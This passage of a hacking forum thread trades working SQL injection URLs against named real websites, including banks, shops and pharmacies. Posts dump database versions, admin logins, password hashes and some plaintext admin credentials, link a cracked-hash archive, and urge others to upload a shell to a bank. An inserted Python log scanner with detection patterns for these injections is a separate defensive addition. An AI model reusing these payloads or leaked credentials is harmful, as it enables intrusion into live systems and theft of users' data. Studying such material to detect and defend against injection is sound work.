SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    Национальный Банк Развития
    Also, using LOAD_FILE: /etc/networks, /etc/group, /etc/services, /etc/hosts, /etc/profile
    Version: 4.0.10-gamma
    User: root@localhost
     
    3 people like this.
  2. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    ;)

    Code:

    http://www.zonanu.nu/anketa.php?id=-9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,concat_ws(0x3a,login,pass),34,35+from+u57027_2.osnova/*

    +

    http://www.paradiz.nu/news.php?id=-9+union+select+1,concat(login,0x3a,password),3,4+from+u57027_3.fs_admin/*

    There are four of these sites in total, but they all share the same database.


    ___________________________________________



    Code:

    http://otdohni.nu/full_view.php?id=-130+union+select+1,concat(table_name,0x3a,column_name),3,4+from+information_schema.columns/*
    Code:

    http://otdohni.nu/full_view.php?id=-130+union+select+1,concat_ws(0x3a,id,login,pass),3,4+from+admins/*
    Code:

    http://otdohni.nu/full_view.php?id=-130+union+select+1,concat_ws(0x3a,id,login,pass,mail,tel),3,4+from+clients/*
    Code:


    http://otdohni.nu/full_view.php?id=-130+union+select+1,concat_ws(0x3a,id,login,pass,mail,tel),3,4+from+users/*

    Admin panel

    http://otdohni.nu/admin
    login/pass:
    xs7df9023fgh55:dsfgy877gfh7gv5h8m76gh



    :D
     
    1 person likes this.
  3. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    4.0.24_Debian-10sarge2-log
    obdesigualtats
    [email protected]

    4.1.22-standard
    phpvilla_php
    phpvilla_root@localhost

    4.1.20
    blog
    root@localhost
     
    #3283 NOmeR1, 12 Oct 2007
    Last edited: 12 Oct 2007
  4. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    Damn. nasa-academy.org <- 86 columns.
    5.0.26-max-log
    academy
    academy@localhost

    Come on, can't NASA hire decent specialists to build a site without bugs?
     
    2 people like this.
  5. delay(0)

    delay(0) Member

    Joined:
    22 Nov 2006
    Messages:
    90
    Likes Received:
    41
    Reputations:
    6
    Code:
    http://omsk.arsec.ru/modules/articles/article.php?id=1+union+select+1,2,3,4,5,6,concat(uname,0x3a,pass),8,9,1,2,3,4,5,6,7,8,9,1,2+from+u26773.ars_users+limit+1,1/*
    admin:48c7b8a13ce1f0fbbec213d87ebcda5e

    Decrypted. :) (Users: 4996, Found: 3220)
    http://rapidshare.com/files/62099632/hashes.rar.html
     
    2 people like this.
  6. WebeX

    WebeX New Member

    Joined:
    31 Mar 2007
    Messages:
    15
    Likes Received:
    4
    Reputations:
    -6
    http://www.0629.com.ua/view_news.php?id_news=
    I just can't figure out what to do with it!
     
  7. valiko

    valiko Elder - Старейшина

    Joined:
    28 Jan 2007
    Messages:
    152
    Likes Received:
    144
    Reputations:
    19
    Code:
    http://www.house-ua.com/item.php?skin=kv_pr&id=-23468'+union+select+user(),version(),database()/*
     
  8. sulaspaka

    sulaspaka New Member

    Joined:
    2 Oct 2007
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    Help me work this one out

    Code:
    http://tip.it/runescape/?times='+UNION+SELECT+1,2,3,4,5/*
     
  9. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    174
    Likes Received:
    288
    Reputations:
    20
    Code:
    http://tip.it/runescape/?times='+UNION+SELECT+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5/*
    admin@localhost:5.0.27-log:runescape
    Output the number of tables
    Code:
    http://tip.it/runescape/?times='+UNION+SELECT+1,2,3,count(table_name),5+from+information_schema.tables/*
    142, =///
    Output the tables that have a password column
    Code:
    http://tip.it/runescape/?times='+UNION+SELECT+1,2,3,concat(table_schema,0x3a,table_name),5+from+information_schema.columns+where+column_name=char(112,97,115,115,119,111,1 14,100)+limit+0,1/*
    lotro:adds_users
    runescape:adds_users
    war:adds_users
    Output, for example, the columns of lotro:adds_users
    Code:
    http://tip.it/runescape/?times='+UNION+SELECT+1,2,3,concat(column_name),5+from+information_schema.columns+where+table_schema=char(108,111,116,114,111)+and+table_name=char(97,100 ,100,115,95,117,115,101,114,115)+limit+0,1/*
    user_id
    user_name
    password
    etc.
    etc., using limit
     
    3 people like this.
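
Added example, not part of the thread: the requests quoted in the post above share markers that a defender can match in web-server access logs once the query string is URL-decoded (a UNION SELECT, a reference to information_schema, string literals built with char(...), a trailing /* comment). The log lines, paths, rule names and function names are constructed for this illustration.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

RULES = {  # markers drawn from the request patterns quoted in the thread
    "union_select": re.compile(r"\bunion\b.{0,40}?\bselect\b", re.I | re.S),
    "information_schema": re.compile(r"\binformation_schema\b", re.I),
    "char_literal": re.compile(r"\bchar\s*\(\s*\d+(?:\s*,\s*\d+)+\s*\)", re.I),
    "hex_separator": re.compile(r"\bconcat(?:_ws)?\s*\(.*0x[0-9a-f]{2}", re.I | re.S),
    "trailing_comment": re.compile(r"(?:/\*|--\s|#)\s*$"),
    "fingerprint_call": re.compile(r"\b(?:version|user|database)\s*\(\s*\)", re.I),
    "load_file": re.compile(r"\bload_file\s*\(", re.I),
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def normalize(value: str) -> str:
    """Undo nested URL encoding (three passes) and collapse whitespace."""
    for _ in range(3):
        value = unquote_plus(value)
    return re.sub(r"\s+", " ", value).strip()

def decode_char_literals(value: str) -> list:
    """Spell out char(117,115,...) literals so an analyst can read them."""
    groups = re.findall(r"\bchar\s*\(([\d\s,]+)\)", value, re.I)
    return ["".join(chr(int(n)) for n in g.split(",")
                    if n.strip() and int(n) < 0x110000) for g in groups]

def scan_line(line: str) -> dict:
    """Return {parameter: [rule names]} for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return {}
    hits = {}
    for name, raw in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
        matched = [rule for rule, rx in RULES.items() if rx.search(normalize(raw))]
        # "union ... select" alone occurs in benign text; require a second marker.
        if "union_select" in matched and len(matched) >= 2:
            hits[name] = matched
    return hits

# Constructed log lines (documentation IP ranges, made-up paths).
SAMPLE_LOG = [
    '203.0.113.7 - - [13/Oct/2007:10:01:02 +0000] "GET /news.php?id=-1+union+select+1,concat(user(),0x3a,version()),3/* HTTP/1.1" 200 512',
    '203.0.113.7 - - [13/Oct/2007:10:01:09 +0000] "GET /view.php?times=%27+UNION+SELECT+1,2,3,column_name,5+from+information_schema.columns+where+table_name=char(117,115,101,114,115)+limit+0,1/* HTTP/1.1" 200 498',
    '198.51.100.20 - - [13/Oct/2007:10:02:30 +0000] "GET /search.php?q=student+union+select+committee&page=2 HTTP/1.1" 200 1830',
    '203.0.113.7 - - [13/Oct/2007:10:03:11 +0000] "GET /item.php?id=-5%2520union%2520select%2520user()%252c2%252f%252a HTTP/1.1" 200 401',
]

if __name__ == "__main__":
    print([scan_line(line) for line in SAMPLE_LOG])
```

The third sample line is benign text that happens to contain "union select" and is not flagged; the fourth is double URL-encoded and is still caught after normalization.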
  10. Underwit

    Underwit Banned

    Joined:
    6 Oct 2006
    Messages:
    191
    Likes Received:
    137
    Reputations:
    16
    www.uselessjunk.com

    Well, everything is clear here)

    Admins

    Users

    Admin panel

    www.uselessjunk.com/admin.php

    Admins:
    id:name:pass

    1:admin:tigerwoods
    2:hoover:stile
    3:turtle:turtleuj2007
    4:matt:diabl0
     
    #3290 Underwit, 13 Oct 2007
    Last edited: 13 Oct 2007
    3 people like this.
  11. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    -------------deleted---repost--------------





    www.rare.ru

    http://www.rare.ru/show.php?index=-13+union+select+1,2,3,concat(version(),0x2F,database(),0x2F,user()),5/*

    5.0.45-log/rareru/[email protected]

    http://www.rare.ru/show.php?index=-13+union+select+1,2,3,table_name,table_schema+from+information_schema.tables/*

    The tables; you can dig around

    http://www.rare.ru/show.php?index=-13+union+select+1,2,3,pass,login+from+users/*

    login\hash
     
    #3291 ElteRUS, 13 Oct 2007
    Last edited by a moderator: 13 Oct 2007
    2 people like this.
  12. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    174
    Likes Received:
    288
    Reputations:
    20
    Code:
    http://www.zeromag.com/articles/article_view.php?id=-1'+union+select+1,2,3,4,5,concat(user(),0x3a,version( ),0x3a,database())/*&pi=1&PHPSESSID=
    [email protected]:4.1.22-standard:zero2
    Code:
    http://www.zeromag.com/articles/article_view.php?id=-1'+union+select+1,2,3,4,5,concat(username,0x3a,password)+f rom+users/*&pi=1&PHPSESSID=
    rootadmin:cd92a26534dba48cd785cdcc0b3e6bd1 etc.. <395
    Code:
    http://www.confidence-mag.com/story.php?id=-7+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,datab ase()),5,6,7,8,9,10,11,12,13,14,15,16/*
    [email protected]:4.0.23-Max-log:v115400
     
  13. _Master-

    _Master- Banned

    Joined:
    30 May 2007
    Messages:
    76
    Likes Received:
    64
    Reputations:
    13
    Code:
    http://www.yuretz.ru/prikol.php?id=-471+union+select+1,convert(version()+using+cp1251),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
     
    1 person likes this.
  14. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    z-chat.ru



    http://www.z-chat.ru/inc/birthday.php?day=16&month=-5+union+select+concat(version(),0x2F,database(),0x2F,user()),2/*

    4.0.25/zchatspb/zchatspb@local


    http://www.z-chat.ru/inc/birthday.php?day=16&month=-5+union+select+concat(login,0x2F,passwd,0x2F,icq),2+from+user/*

    login\hash\UIN, but there is something odd with the output .... probably a limit on string length .. though who knows

    Yes, you can output the login, hash and UIN separately, but that's not as neat )
     
    #3294 ElteRUS, 13 Oct 2007
    Last edited: 13 Oct 2007
  15. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    reporter.kherson.ua



    http://www.reporter.kherson.ua/article.php?sid=-1+union+select+1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7,8,9/*

    5.0.32-Debian_7etch1-log:reporter:lsd@localhost


    http://www.reporter.kherson.ua/article.php?sid=-1+union+select+1,2,3,uname,5,6,7,pass,9+from+users+limit+7,1/*

    login \ password
     
    1 person likes this.
  16. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    174
    Likes Received:
    288
    Reputations:
    20
    Code:
    http://drugspharma.com/index.php?mod=cart&quantity=1&action=add&ID=-1+union+select+1,2,3,concat(user(),0x3a,version (),0x3a,database()),5,6,7, 8,9,10,11/*
    hunting_tkdph@localhost:4.1.22-standard:hunting_tkrx
    Code:
    http://refill-rx.net/index.php?mod=cart&quantity=1&action=add&ID=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,datab ase()),5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
    pdlweb@localhost:4.1.22-standard:pdlweb_Pharmacy
     
    1 person likes this.
  17. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    БашкомснабБанк
    Version:4.0.27-standard-log
    User:bashbank@localhost
    6 users, all with access to the admin panel, among them:
    denis:72d0d440b5ebc3cb162bf2cbd0f680ee:za1og
    blair:098f6bcd4621d373cade4e832627b4f6:test

    Whoever isn't afraid, upload a shell ;)
     
    #3297 0nep@t0p, 14 Oct 2007
    Last edited: 14 Oct 2007
    2 people like this.
  18. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    Code:
    http://bestposters.ru/main.php?cat=-70+union+select+1,2,concat(login,0x3a,password,0x3a,email),4,5+from+users+limit+1/*
    A shop selling posters.
    P.S.: work through limit )
     
    3 people like this.
  19. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    exactly.ru


    http://www.exactly.ru/?sub=-10'+union+select+1,concat(version(),0x3a,database(),0x3a,user()),3/*

    5.0.27-log:catalog2:catalog2@localhost


    http://www.exactly.ru/?sub=-10'+union+select+1,table_name,3+from+information_schema.tables+limit+0,1/*

    Access to information_schema. Didn't find anything interesting




    ma3da.ru


    http://www.ma3da.ru/news.php?news_id=-862+union+select+1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7,8,9,10,11,12,13,14,15,16/*

    4.1.20-lk-log:ma3daru:ma3daru@localhost

    All queries against the tables are rejected (
     
    1 person likes this.
  20. v1ru$

    v1ru$ Elder - Старейшина

    Joined:
    17 Mar 2007
    Messages:
    272
    Likes Received:
    196
    Reputations:
    17
    The first injection I found
    Code:
    http://www.gardenshop.ru/courier.php?CategoryId=-329+union+select+co  ncat(version(),0x3a,database(),0x3a,u ser()),2,3/*
    
    Could someone work this one out? I can't get anywhere(
    Code:
    http://www.gardenshop.ru/co urier.php?CategoryId=-329+union+select+1,table_name,3+from+information_sch  ema.tables+limit+31,1/*
    http://www.gardenshop.ru/courier.php?CategoryId=-329+union+select+1,co  lumn_ name,3+from+INFORMATION_SCHEMA.COLUMNS+where+table_name='Users'+limit+1,1/*
    
     
    1 person likes this.